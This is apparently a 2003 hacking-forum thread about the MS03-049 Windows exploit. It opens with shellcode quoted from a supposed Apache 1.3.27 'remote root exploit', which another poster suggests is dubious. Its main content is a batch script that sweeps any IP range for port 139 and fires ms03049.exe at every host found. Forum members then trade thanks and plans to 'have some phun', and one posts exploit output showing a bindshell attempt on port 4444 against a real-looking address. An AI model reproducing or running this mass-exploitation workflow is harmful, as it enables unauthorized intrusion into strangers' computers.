static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};


Hmmm.... triggered a memory and made me grep my inbox ;]


http://seclists.org/lists/fulldisclosure/2003/Jun/0727.html


Might want to take a read....




slynx
i must admit i have not updated my server in a VERY long time.....
if anyone wants free space, email, etc. tho your welcome to it, just email me....

and yes, my program works VERY slow as it is not multithreaded in the scanning function....admittedly i don't kno exactley how to pull that one off.....

just use the x-scan plugin and run on a single machine....in case u have not noticed u need only prove a single ip for my recode... then u dont have to scan so many with it.....
DJVASTVASTY2K
QUOTE (pipes @ Dec 16 2003, 01:48 AM)
yerp yep yep yep...

Hackit.us? You awake still?

http://www.hackit.us/main/exploits/apache1327.c

/* :: PRIVATE - DO NOT DISTRIBUTE ::
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info_at_koec.org)
*/


with shellcode....

static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};


Hmmm.... triggered a memory and made me grep my inbox ;]


http://seclists.org/lists/fulldisclosure/2003/Jun/0727.html


Might want to take a read....

What Has This Apache Exploit got to do with [Ms03-049] ???

Best Regards

Adam

Vast Gsm
WeeDMoNKeY
it doesnt, it has to do with hackit.us...
flame
here ya go weedmonkey
CODE
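@echo off
rem Usage: <this>.bat <start ip> <end ip>
rem Sweeps the range for TCP/139 with scan100, then runs ms03049.exe
rem against each listed host, one at a time.
rem Fix: guard the delete so the first run does not print "Could Not Find".
if exist scan.txt del scan.txt
scan100 -p 139 %1 %2
rem scan100's first and last output lines are not addresses: delete them
rem by hand in notepad, save, quit, then press a key to continue.
notepad scan.txt
pause
for /f "tokens=1 delims=" %%a in (scan.txt) do ms03049.exe %%a
echo.
echo. Any Luck ?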

Bloodman
THX
4
THIS
VERY
COOL
CHILLING
TOOL
wink.gif
Certox
Thank You
T-BoNe
QUOTE (flame @ Dec 19 2003, 12:24 PM)
here ya go weedmonkey
CODE
@echo off
del scan.txt
scan100 -p 139 %1 %2
notepad scan.txt          
rem the notepad is for editing the txt file and clean the 1st and last line manually then save,quit, and press a key. :)
pause
for /f "tokens=1 delims=" %%a, in (scan.txt) do ms03049.exe %%a
echo.
echo. Any Luck ?


don't you just love batch files smile.gif
Thonyx
Thx for this package!

I'll test it now! biggrin.gif
robsonbr
ohh (filtered) nice tool m8, lets me test it biggrin.gif
cheers
passi
isn't there a better way to scan?
Carlos
thnx for taking the time to edit/add features to this exploit for us.

biggrin.gif
WeeDMoNKeY
fuckin nice flame.. flame = the man.
Freaky
Yeah nice biggrin.gif.
Nice Job etc.

Let'S have some phun wink.gif
wh173r
Alright, im wondering... how do i know if a machine is exploitable. Ive scanned some with IPCscan that seem to be workstation (altho probably 2000), but cant exploit. Right now im doing it with the exploit and was wondering if netcat should be in the dir with the file (it is now, just wondering). Or, dose the exploit telnet.

[+] xxx.xxx.xxx.xxx appears to be up ... scanning port 139 ...
[+] Found port 139 open for connections on xxx.xxx.xxx.xxx ...
[+] Connection socket will sleep for four seconds ...
[+] Attacking remote host 165.123.170.106 ...

System error 53 has occurred.

The network path was not found.

[+] GetProcAddr: 71c59530
[+] Sending exploit to 165.123.170.106 ...
[+] Connection socket initialized ...
[+] Trying to connect to xxx.xxx.xxx.xxx:4444 ...
[x] Connect to bindshell on xxx.xxx.xxx.xxx:4444 failed ...

are the erros i seem to get for every ip. what do these mean !
HiBob
thanks, looks great smile.gif
flame
QUOTE (wh173r @ Dec 20 2003, 06:30 PM)
Alright, im wondering... how do i know if a machine is exploitable. Ive scanned some with IPCscan that seem to be workstation (altho probably 2000), but cant exploit. Right now im doing it with the exploit and was wondering if netcat should be in the dir with the file (it is now, just wondering). Or, dose the exploit telnet.
are the erros i seem to get for every ip. what do these mean !

if you get a shell - then its exploitable
if shell=0 then goto quit
:quit
@echo try some more ip's wanker